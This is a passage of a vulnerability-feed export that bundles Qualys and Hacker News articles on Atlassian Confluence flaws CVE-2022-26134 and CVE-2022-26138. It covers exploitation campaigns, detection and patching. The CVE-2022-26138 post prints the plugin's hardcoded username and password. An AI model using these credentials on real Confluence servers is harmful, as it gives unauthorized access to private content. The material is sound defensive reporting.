**[Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)**.**\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-19T00:02:03", "description": "Over the last few months, Atlassian Confluence has increasingly become a target for attackers. In June 2022, a critical severity OGNL Remote Code Execution vulnerability was disclosed (CVE-2022-26134). More recently, CVE-2022-26138 was disclosed on social media platforms in July 2022.\n\nIn CVE-2022-26138, a Confluence user account is created by the Questions for Confluence app with hardcoded credentials stored inside the plugin jar file available on [Atlassian packages](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>). An attacker with knowledge of these credentials could log into the Confluence application and access all contents within the confluence-users group. [Atlassian](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has rated the vulnerability "critical" and highlighted that the vulnerability is being exploited in the wild.\n\nDue to the nature of this vulnerability, it can only be verified remotely by logging into the Confluence application with the hardcoded credentials. Traditional open source scanners and scripts are checking for the Location HTTP response header and 302 status code to verify the credentials, which could result in false positives. [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released QID 150556 that confirms the vulnerability detection in two steps. The detection takes an additional step to verify the valid credentials by navigating to the user profile page and verifying that the correct page is returned. This check is much more efficient in comparison to open source scanners and eliminates any possibility of false positives.\n\n## About CVE-2022-26138\n\nAccording to Confluence's [Questions for Confluence Security Advisory](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), both Confluence Server and Confluence Data Center products using affected versions of the Questions for Confluence app are impacted by CVE-2022-26138.\n\nAffected versions :\n\nQuestions for Confluence 2.7.x| 2.7.34 \n2.7.35 \n---|--- \nQuestions for Confluence 3.0.x| 3.0.2 \n \n## Hardcoded Credentials Vulnerability\n\nAffected versions of the Questions for Confluence app, when installed on a Confluence application, create a user account with username `disabledsystemuser` and password `disabled1system1user6708` and the account is added to confluence-users group, which allows viewing and editing all non-restricted pages within Confluence [by default](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>). A remote attacker can easily leverage these credentials to browse sensitive contents within the Confluence application.\n\nThese hardcoded credentials are stored in `default.properties` file inside a [`confluence-questions-X.X.X.jar` file](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>), as shown below.\n\n\n\n## Detecting the Vulnerability with Qualys Web Application Scanning\n\nExisting Qualys customers can detect CVE-2022-26138 on their target Confluence instance with Qualys Web Application Scanning (WAS) using the following Qualys ID (QID):\n\n * 150556 : Atlassian Confluence Server and Data Center : Questions for Confluence App - Hardcoded Credentials (CVE-2022-26138)\n\nThe QID is part of the core category. A vulnerability scan with a core or custom search list including the QID in the options profile will flag all vulnerable applications, as shown below.\n\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, the user will see similar results in the vulnerability scan report, as shown here:\n\n\n\n### Solution & Mitigation\n\nTo remediate this vulnerability, any organization using the Questions for Confluence app is advised to ensure the following:\n\n * Upgrade to Version 2.7.x >= 2.7.38 (compatible with Confluence 6.13.18 through 7.16.2) and Versions >= 3.0.5 (compatible with Confluence 7.16.3 and later)\n * Disable or delete the disabledsystemuser account\n\nPlease note that uninstalling the Questions for Confluence app does not remediate this vulnerability. The disabledsystemuser account does not automatically get removed after the app has been uninstalled. It is possible for this account to be present if the Questions for Confluence app was previously installed. It is advised to check the list of active users to ensure the Confluence instance is not affected.\n\n### Credit\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>\n\n### CVE Details:\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26138>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T10:12:53", "type": "qualysblog", "title": "Atlassian Confluence: Questions for Confluence App Hardcoded Credentials Vulnerability (CVE-2022-26138)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138"], "modified": "2022-08-17T10:12:53", "id": "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-07-25T03:59:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). \"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. \n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T09:57:46", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYAJVYh7pU2b-Cxud9O1OpqsSwZ8YbSRc4HT6Cl84UE1B0y7nA6w78v6G2gfrH0CgQlYIfu0sypoAedPhkg5IjEPSr4btJnWbRlNUVivoYBtop-pya2puoyFdfhMSBEHez9B2xUru68Zv-DLxNWbxFad3b5mVOAcpQY8lBe_JBMpXEgmBFN0ec7z-R/s728-e100/linux.jpg>)\n\nA cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.\n\n\"The updates include the deployment of new versions of a crypto miner and an IRC bot,\" Microsoft Security Intelligence [said](<https://twitter.com/MsftSecIntel/status/1542281805549764608>) in a series of tweets on Thursday. \"The group has actively updated its techniques and payloads over the last year.\"\n\n8220, active since [early 2017](<https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html>), is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the [Rocke](<https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html>) cybercrime group in their attacks.\n\nIn July 2019, the Alibaba Cloud Security Team [uncovered](<https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055>) an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang [resurfaced](<https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/>) with Tsunami [IRC botnet](<https://en.wikipedia.org/wiki/IRC_bot>) variants and a custom \"PwnRig\" miner.\n\nNow according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server ([CVE-2022-26134)](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>) and Oracle WebLogic ([CVE-2019-2725](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>)) for initial access.\n\nThis step is succeeded by the retrieval of a malware loader from a remote server that's designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.\n\nBesides achieving persistence by means of a cron job, the \"loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate,\" Microsoft said.\n\nThe findings come as Akamai [revealed](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 67% of the attacks are said to have originated from the U.S.\n\n\"In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,\" Akamai's Chen Doytshman said this week. \"These top three verticals make up more than 75% of the activity.\"\n\nThe attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.\n\n\"What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,\" Doytshman added. \"As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T05:36:00", "type": "thn", "title": "Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2022-26134"], "modified": "2022-07-01T08:20:23", "id": "THN:F0450E1253FFE5CA527F039D3B3A72BD", "href": "https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-22T08:18:20", "description": 